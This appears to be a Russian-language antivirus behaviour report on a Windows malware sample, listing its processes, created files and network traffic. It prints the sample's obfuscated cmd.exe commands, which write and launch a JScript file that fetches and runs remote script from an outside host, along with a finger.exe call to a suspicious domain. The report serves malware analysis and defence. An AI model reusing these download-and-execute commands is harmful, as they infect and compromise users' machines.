Техническая информация
Вредоносные функции
Создает и запускает на исполнение
- '<SYSTEM32>\finger.exe' ok@q1sjdk3awe.bombeirodocvencido.email
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\t5a.js"
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\t5a.js
Сетевая активность
TCP
Запросы HTTP GET
- http://bw#######1d.justacmais.trade/?1/
UDP
- DNS ASK q1########.bombeirodocvencido.email
- DNS ASK bw#######1d.justacmais.trade
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "Set NWSB=.j&&sET HEAHV=vYxHkarYxHk a =YxHk 'scYxHkriYxHkptYxHk:';GYxHketYxHkObjYxHkecYxHkt(YxHka+'HYxHkTtpYxHk:&&sET CVGE=LKXPBLKXPBbwwwet3aa1d.justacmais.tradeLKXPB?1LKXPB')&&sEt/^p 52...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p 52WJF="%HEAHV:YxHk=%%CVGE:LKXPB=/%" 0<nul 1>C:\Users\Public\t5a%NWSB%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start C:\Users\Public\t5a%NWSB%s "
- '<SYSTEM32>\cmd.exe' /c start C:\Users\Public\t5a.js
